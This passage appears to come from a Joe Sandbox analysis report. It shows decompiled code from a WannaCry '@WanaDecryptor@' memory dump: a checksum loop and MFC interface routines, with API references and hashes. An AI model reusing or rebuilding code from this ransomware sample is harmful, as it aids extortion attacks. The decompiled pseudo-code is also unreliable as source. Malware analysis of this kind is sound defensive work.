* 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4);
                                  							_t76 = _t76 + 8;
                                  							_t115 = _t115 - 1;
                                  						} while (_t115 != 0);
                                  					}
                                  					if(_t118 != 0) {
                                  						do {
                                  							_t29 = _t29 >> 0x00000008 ^  *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4);
                                  							_t76 = _t76 + 1;
                                  							_t118 = _t118 - 1;
                                  						} while (_t118 != 0);
                                  					}
                                  					return  !_t29;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}








                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5d39ba973bdaee26a7e96979db138631e8a564ea24786ef9523c099e99afe77a
                                  • Instruction ID: cecdefe8fda50f928b4117980ad8d25e533be349777a256c316ace181cfd3b57
                                  • Opcode Fuzzy Hash: 5d39ba973bdaee26a7e96979db138631e8a564ea24786ef9523c099e99afe77a
                                  • Instruction Fuzzy Hash: 1E31A6627A959207D350CEBEAC90277BB93D7DB306B6CC678D584C7A0EC579D8078244
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004090F0(intOrPtr* __ecx, void* __fp0) {
                                  				signed int _t226;
                                  				signed int _t230;
                                  				struct tagPOINT _t232;
                                  				long _t233;
                                  				signed int _t237;
                                  				signed int _t242;
                                  				intOrPtr _t246;
                                  				intOrPtr* _t264;
                                  				signed int _t269;
                                  				signed int _t270;
                                  				signed int _t271;
                                  				signed int _t272;
                                  				signed int _t276;
                                  				intOrPtr _t279;
                                  				signed int _t282;
                                  				intOrPtr* _t283;
                                  				struct tagPOINT _t295;
                                  				signed int _t311;
                                  				signed int _t314;
                                  				signed int** _t321;
                                  				intOrPtr _t361;
                                  				intOrPtr _t418;
                                  				intOrPtr* _t429;
                                  				signed int* _t433;
                                  				long _t437;
                                  				signed int _t438;
                                  				intOrPtr* _t440;
                                  				signed int _t441;
                                  				intOrPtr _t442;
                                  				void* _t443;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041414D);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t442;
                                  				_t443 = _t442 - 0xc4;
                                  				_t321 =  *(_t443 + 0xd8);
                                  				_t226 = _t321[1];
                                  				_t429 = __ecx;
                                  				if((_t226 & 0x00000003) == 0) {
                                  					L49:
                                  					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
                                  					return _t226;
                                  				}
                                  				_t433 =  *_t321;
                                  				 *(_t443 + 0x40) = _t226 & 0x00000004;
                                  				 *(_t443 + 0x10) = 0;
                                  				L00412DA6();
                                  				_push(_t443 + 0x14);
                                  				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
                                  				L00412DD6();
                                  				_t230 = _t321[1] & 0x00000300;
                                  				if(_t230 == 0x100) {
                                  					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                  						_push("%d%%");
                                  						L00412DA0();
                                  					}
                                  					_t232 = _t321[7];
                                  					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
                                  					asm("fild dword [esp+0x28]");
                                  					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
                                  					asm("fidiv dword [esp+0x28]");
                                  					L0041304A();
                                  					 *(_t443 + 0x10) = _t232;
                                  				} else {
                                  					if(_t230 == 0x200) {
                                  						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                  							_push("%d");
                                  							L00412DA0();
                                  						}
                                  						 *(_t443 + 0x10) = _t321[6];
                                  					}
                                  				}
                                  				_t226 =  *(_t443 + 0x14);
                                  				if( *((intOrPtr*)(_t226 - 8)) == 0) {
                                  					L48:
                                  					 *(_t443 + 0xdc) = 0xffffffff;
                                  					L00412CC2();
                                  					goto L49;
                                  				} else {
                                  					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
                                  					L00412DE2();
                                  					_t437 = _t233;
                                  					 *(_t443 + 0x54) = _t433;
                                  					 *(_t443 + 0x50) = 0x416794;
                                  					 *(_t443 + 0xdc) = 1;
                                  					E00409DF0(_t443 + 0x58);
                                  					 *(_t443 + 0x58) = 0x416780;
                                  					 *((char*)(_t443 + 0xe0)) = 2;
                                  					 *(_t443 + 0x64) = 0;
                                  					 *(_t443 + 0x54) = 0x41677c;
                                  					E00409870(_t443 + 0x54, _t437);
                                  					 *(_t443 + 0x68) = _t433;
                                  					 *((char*)(_t443 + 0xe0)) = 4;
                                  					 *(_t443 + 0x70) = 0xffffffff;
                                  					 *(_t443 + 0x68) = 0x416778;
                                  					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
                                  					 *(_t443 + 0x90) = _t237;
                                  					 *(_t443 + 0x6c) = _t237;
                                  					 *(_t443 + 0x88) = _t433;
                                  					_push(1);
                                  					 *((char*)(_t443 + 0xe0)) = 6;
                                  					 *(_t443 + 0x90) = 0;
                                  					 *(_t443 + 0x88) = 0x416774;
                                  					L00412DC4();
                                  					 *(_t443 + 0x70) = _t237;
                                  					 *(_t443 + 0x8c) = _t237;
                                  					 *(_t443 + 0x7c) = _t433;
                                  					_push(0xe);
                                  					 *((char*)(_t443 + 0xe0)) = 8;
                                  					 *(_t443 + 0x84) = 0xffffffff;
                                  					 *(_t443 + 0x7c) = 0x416770;
                                  					L00413004();
                                  					 *(_t443 + 0x74) = _t237;
                                  					 *(_t443 + 0x80) = _t237;
                                  					 *((char*)(_t443 + 0xe4)) = 9;
                                  					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
                                  					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
                                  					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
                                  					L00412DA6();
                                  					_push( *(_t443 + 0x10));
                                  					_push( *(_t443 + 0x14));
                                  					_push(_t443 + 0x1c);
                                  					 *((char*)(_t443 + 0xe8)) = 0xa;
                                  					L00412E00();
                                  					_t443 = _t443 + 0xc;
                                  					_t242 = 0;
                                  					 *((intOrPtr*)(_t443 + 0x28)) = 0;
                                  					if(_t437 != 0) {
                                  						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
                                  						_t242 = 0;
                                  						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
                                  					}
                                  					 *(_t443 + 0x10) = _t242;
                                  					 *(_t443 + 0x2c) = _t242;
                                  					 *(_t443 + 0x24) = _t242;
                                  					_t438 = 0;
                                  					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
                                  					_t246 =  *((intOrPtr*)(_t443 + 0x28));
                                  					if(_t246 != 0) {
                                  						if(_t246 != 0x5a) {
                                  							if(_t246 != 0xb4) {
                                  								if(_t246 != 0x10e) {
                                  									goto L21;
                                  								}
                                  								_t441 =  *(_t443 + 0x20);
                                  								 *(_t443 + 0x10) = _t441;
                                  								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                  								_t438 =  ~_t441;
                                  								L20:
                                  								 *(_t443 + 0x24) = 0;
                                  								goto L21;
                                  							}
                                  							_t311 =  *(_t443 + 0x20);
                                  							 *(_t443 + 0x2c) = _t311;
                                  							_t438 = 0;
                                  							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                  							 *(_t443 + 0x24) =  ~_t311;
                                  							goto L21;
                                  						}
                                  						_t438 =  *(_t443 + 0x20);
                                  						 *(_t443 + 0x10) = _t438;
                                  						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                  						goto L20;
                                  					} else {
                                  						_t314 =  *(_t443 + 0x20);
                                  						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                  						 *(_t443 + 0x2c) = _t314;
                                  						 *(_t443 + 0x24) = _t314;
                                  						L21:
                                  						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
                                  						if((_t321[1] & 0x00000010) == 0) {
                                  							asm("cdq");
                                  							 *(_t443 + 0x44) =  *_t433;
                                  							asm("cdq");
                                  							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
                                  							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
                                  								_t264 =  *((intOrPtr*)(_t443 + 0xec));
                                  								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
                                  									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
                                  								}
                                  								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
                                  								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
                                  									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                  									if( *(_t443 + 0x90) == 0xffffffff) {
                                  										 *(_t443 + 0x6c) = _t282;
                                  									}
                                  									_t283 = _t440;
                                  									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
                                  									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
                                  									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
                                  									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
                                  									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
                                  									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
                                  								}
                                  								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                  									L39:
                                  									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
                                  									 *(_t443 + 0xdc) = 9;
                                  									L00412CC2();
                                  									 *(_t443 + 0x78) = 0x416770;
                                  									_t269 =  *(_t443 + 0x74);
                                  									 *(_t443 + 0xdc) = 0xb;
                                  									if(_t269 != 0xffffffff) {
                                  										_push(_t269);
                                  										L00413004();
                                  									}
                                  									 *(_t443 + 0x84) = 0x416774;
                                  									_t270 =  *(_t443 + 0x70);
                                  									 *(_t443 + 0xdc) = 0xc;
                                  									if(_t270 != 0) {
                                  										_push(_t270);
                                  										L00412DC4();
                                  									}
                                  									 *(_t443 + 0x64) = 0x416778;
                                  									_t271 =  *(_t443 + 0x6c);
                                  									 *(_t443 + 0xdc) = 0xd;
                                  									if(_t271 != 0xffffffff) {
                                  										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
                                  									}
                                  									 *(_t443 + 0x50) = 0x41677c;
                                  									_t272 =  *(_t443 + 0x60);
                                  									 *(_t443 + 0xdc) = 0xf;
                                  									if(_t272 != 0) {
                                  										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
                                  									}
                                  									 *(_t443 + 0x60) = 0;
                                  									L00412D52();
                                  									_t226 = _t443 + 0x58;
                                  									 *(_t443 + 0x58) = 0x415c00;
                                  									 *(_t443 + 0x70) = _t226;
                                  									 *(_t443 + 0xdc) = 0x10;
                                  									L00412D52();
                                  									 *(_t443 + 0x58) = 0x415bec;
                                  									 *(_t443 + 0x50) = 0x416794;
                                  									goto L48;
                                  								} else {
                                  									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                  									if( *(_t443 + 0x6c) == 0xffffffff) {
                                  										 *(_t443 + 0x6c) = _t276;
                                  									}
                                  									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
                                  									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
                                  									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
                                  									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
                                  									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
                                  									_t279 =  *_t429;
                                  									_push(_t443 + 0x48);
                                  									_push(_t443 + 0x18);
                                  									_t361 = _t443 + 0x38;
                                  									L38:
                                  									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
                                  									goto L39;
                                  								}
                                  							}
                                  							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
                                  							goto L39;
                                  						}
                                  						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
                                  						_t295 =  *(_t443 + 0x2c);
                                  						if( *(_t443 + 0x40) == 0) {
                                  							_t295 =  *(_t443 + 0x10);
                                  						}
                                  						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                  							goto L39;
                                  						} else {
                                  							asm("cdq");
                                  							_t418 =  *((intOrPtr*)(_t443 + 0x34));
                                  							 *(_t443 + 0x40) =  *_t433;
                                  							asm("cdq");
                                  							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
                                  							_t279 =  *_t429;
                                  							_push(_t443 + 0x48);
                                  							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
                                  							_push(_t443 + 0x18);
                                  							goto L38;
                                  						}
                                  					}
                                  				}
                                  			}


































                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                  • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                  • API String ID: 2923375784-3599407550
                                  • Opcode ID: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                  • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                  • Opcode Fuzzy Hash: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                  • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00405230(void* __ecx) {
                                  				RECT* _v12;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				intOrPtr _v44;
                                  				char _v48;
                                  				char _v52;
                                  				void* _v56;
                                  				void* _v60;
                                  				void* _v64;
                                  				void* _v68;
                                  				int _t98;
                                  				int _t99;
                                  				int _t104;
                                  				char* _t106;
                                  				void* _t109;
                                  				char* _t110;
                                  				signed int _t113;
                                  				int _t114;
                                  				void* _t117;
                                  				char* _t118;
                                  				char _t119;
                                  				char* _t120;
                                  				signed int _t122;
                                  				void* _t123;
                                  				int _t126;
                                  				int _t127;
                                  				int _t130;
                                  				void* _t132;
                                  				signed int _t136;
                                  				signed int _t142;
                                  				intOrPtr _t163;
                                  				intOrPtr _t179;
                                  				signed int _t182;
                                  				signed int _t198;
                                  				void* _t199;
                                  				signed int _t200;
                                  				void* _t201;
                                  				intOrPtr* _t205;
                                  				void* _t208;
                                  				intOrPtr* _t212;
                                  				intOrPtr* _t213;
                                  				intOrPtr _t215;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413918);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t215;
                                  				_t208 = __ecx;
                                  				_t182 =  *(__ecx + 0x70);
                                  				if(_t182 != 1) {
                                  					if(__eflags <= 0) {
                                  						L33:
                                  						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
                                  						L34:
                                  						 *[fs:0x0] = _v12;
                                  						return _t98;
                                  					}
                                  					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
                                  					if( *((char*)(__ecx + 0x4b)) != 1) {
                                  						L15:
                                  						_t99 =  *(_t208 + 0x78);
                                  						__eflags = _t99 - 3;
                                  						if(_t99 != 3) {
                                  							__eflags = _t99 - 2;
                                  							if(_t99 != 2) {
                                  								__eflags = _t99;
                                  								if(_t99 != 0) {
                                  									__eflags = _t99 - 1;
                                  									if(_t99 != 1) {
                                  										goto L33;
                                  									}
                                  									_t212 = _t208 + 0x44;
                                  									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                  									_t136 =  *(_t208 + 0x74);
                                  									asm("cdq");
                                  									_t98 = _t198 / _t136;
                                  									__eflags = _t98;
                                  									if(_t98 == 0) {
                                  										goto L34;
                                  									}
                                  									__eflags = _t198 - _t136;
                                  									if(_t198 < _t136) {
                                  										goto L34;
                                  									}
                                  									_t199 = 0;
                                  									__eflags = _t98;
                                  									if(_t98 <= 0) {
                                  										goto L33;
                                  									}
                                  									_t126 = _t98;
                                  									do {
                                  										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
                                  										_push(_t199);
                                  										L00412E12();
                                  										_push(1);
                                  										_push( *(_t208 + 0x74) + _t199);
                                  										L00412E0C();
                                  										_t136 =  *(_t208 + 0x74);
                                  										_t199 = _t199 + _t136;
                                  										_t126 = _t126 - 1;
                                  										__eflags = _t126;
                                  									} while (_t126 != 0);
                                  									goto L33;
                                  								}
                                  								_t213 = _t208 + 0x44;
                                  								_t142 =  *(_t208 + 0x74);
                                  								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                  								asm("cdq");
                                  								_t104 = _t200 / _t142;
                                  								__eflags = _t104;
                                  								if(_t104 == 0) {
                                  									L22:
                                  									_t104 = 1;
                                  									L23:
                                  									_t201 = 0;
                                  									__eflags = _t104;
                                  									if(_t104 <= 0) {
                                  										goto L33;
                                  									}
                                  									_t127 = _t104;
                                  									do {
                                  										_push( *((intOrPtr*)(_t201 +  *_t213)));
                                  										_push(_t142 + _t201);
                                  										L00412E12();
                                  										_push(1);
                                  										_push(_t201);
                                  										L00412E0C();
                                  										_t142 =  *(_t208 + 0x74);
                                  										_t201 = _t201 + _t142;
                                  										_t127 = _t127 - 1;
                                  										__eflags = _t127;
                                  									} while (_t127 != 0);
                                  									goto L33;
                                  								}
                                  								__eflags = _t200 - _t142;
                                  								if(_t200 >= _t142) {
                                  									goto L23;
                                  								}
                                  								goto L22;
                                  							}
                                  							_t106 =  &_v32;
                                  							_push( *(_t208 + 0x74));
                                  							_push(_t106);
                                  							L00412E24();
                                  							_push( *(_t208 + 0x74));
                                  							_push( &_v24);
                                  							_v12 = 8;
                                  							L00412E30();
                                  							_push( &_v48);
                                  							_push(_t106);
                                  							_push( &_v36);
                                  							_v20 = 9;
                                  							L00412E18();
                                  							_push(_t106);
                                  							_v32 = 0xa;
                                  							L00412D9A();
                                  							_v36 = 9;
                                  							L00412CC2();
                                  							_v36 = 8;
                                  							L00412CC2();
                                  							_v36 = 0xffffffff;
                                  							L00412CC2();
                                  							goto L33;
                                  						}
                                  						_push( *(_t208 + 0x74));
                                  						_push( &_v36);
                                  						L00412E1E();
                                  						_v12 = 5;
                                  						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
                                  						_push(_t109);
                                  						_push( &_v36);
                                  						L00412E24();
                                  						_push(_t109);
                                  						_t110 =  &_v52;
                                  						_push(_t110);
                                  						_push( &_v40);
                                  						_v20 = 6;
                                  						L00412E18();
                                  						_push(_t110);
                                  						_v32 = 7;
                                  						L00412D9A();
                                  						_v36 = 6;
                                  						L00412CC2();
                                  						_v36 = 5;
                                  						L00412CC2();
                                  						_v36 = 0xffffffff;
                                  						L00412CC2();
                                  						goto L33;
                                  					}
                                  					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                  					_t113 =  *(__ecx + 0x74) * _t182;
                                  					__eflags = _t163 - _t113;
                                  					if(_t163 >= _t113) {
                                  						goto L15;
                                  					}
                                  					_t114 = _t113 - _t163;
                                  					__eflags = _t114;
                                  					if(_t114 <= 0) {
                                  						goto L15;
                                  					}
                                  					_t130 = _t114;
                                  					do {
                                  						_push( *((intOrPtr*)(__ecx + 0x40)));
                                  						L00412E36();
                                  						_t130 = _t130 - 1;
                                  						__eflags = _t130;
                                  					} while (_t130 != 0);
                                  					goto L15;
                                  				}
                                  				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
                                  					L6:
                                  					_t205 = _t208 + 0x44;
                                  					if( *(_t208 + 0x78) != 0) {
                                  						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
                                  						_push(_t117);
                                  						_push( &_v36);
                                  						L00412E24();
                                  						_t118 =  &_v36;
                                  						_push(1);
                                  						_push(_t118);
                                  						_v12 = 2;
                                  						L00412E1E();
                                  						_push(_t117);
                                  						_push(_t118);
                                  						_push( &_v40);
                                  						_v20 = 3;
                                  						L00412E18();
                                  						_push(_t118);
                                  						_v32 = 4;
                                  						L00412D9A();
                                  						_v36 = 3;
                                  						L00412CC2();
                                  						_v36 = 2;
                                  						L00412CC2();
                                  						_v36 = 0xffffffff;
                                  						L00412CC2();
                                  					} else {
                                  						_push(1);
                                  						_push( &_v24);
                                  						_t119 =  *((intOrPtr*)( *_t205));
                                  						_v36 = _t119;
                                  						L00412E30();
                                  						_v12 = 0;
                                  						_push(_v44);
                                  						_push(_t119);
                                  						_t120 =  &_v36;
                                  						_push(_t120);
                                  						L00412E2A();
                                  						_push(_t120);
                                  						_v24 = 1;
                                  						L00412D9A();
                                  						_v28 = 0;
                                  						L00412CC2();
                                  						_v28 = 0xffffffff;
                                  						L00412CC2();
                                  					}
                                  					goto L33;
                                  				}
                                  				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                  				_t122 =  *(__ecx + 0x74);
                                  				if(_t179 >= _t122) {
                                  					goto L6;
                                  				}
                                  				_t123 = _t122 - _t179;
                                  				if(_t123 <= 0) {
                                  					goto L6;
                                  				}
                                  				_t132 = _t123;
                                  				do {
                                  					_push( *((intOrPtr*)(__ecx + 0x40)));
                                  					L00412E36();
                                  					_t132 = _t132 - 1;
                                  				} while (_t132 != 0);
                                  				goto L6;
                                  			}

                                  APIs
                                  • #940.MFC42(?), ref: 0040527D
                                  • #4277.MFC42(?,00000001), ref: 004052A0
                                  • #923.MFC42(?,00000000,?), ref: 004052B8
                                  • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                  • #4129.MFC42(?,?), ref: 004052FC
                                  • #5710.MFC42 ref: 00405314
                                  • #922.MFC42(?,00000000,00000000), ref: 00405326
                                  • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                  • #940.MFC42(?), ref: 00405396
                                  • #5710.MFC42(?,?), ref: 004053B8
                                  • #4129.MFC42(?,?,?,?), ref: 004053D7
                                  • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                  • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                  • #4129.MFC42(?,?), ref: 00405443
                                  • #4277.MFC42(?,?,?,?), ref: 0040545B
                                  • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                  • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                  • #6778.MFC42(?,00000001), ref: 004054EA
                                  • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                  • #6778.MFC42(00000000,?), ref: 00405536
                                  • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
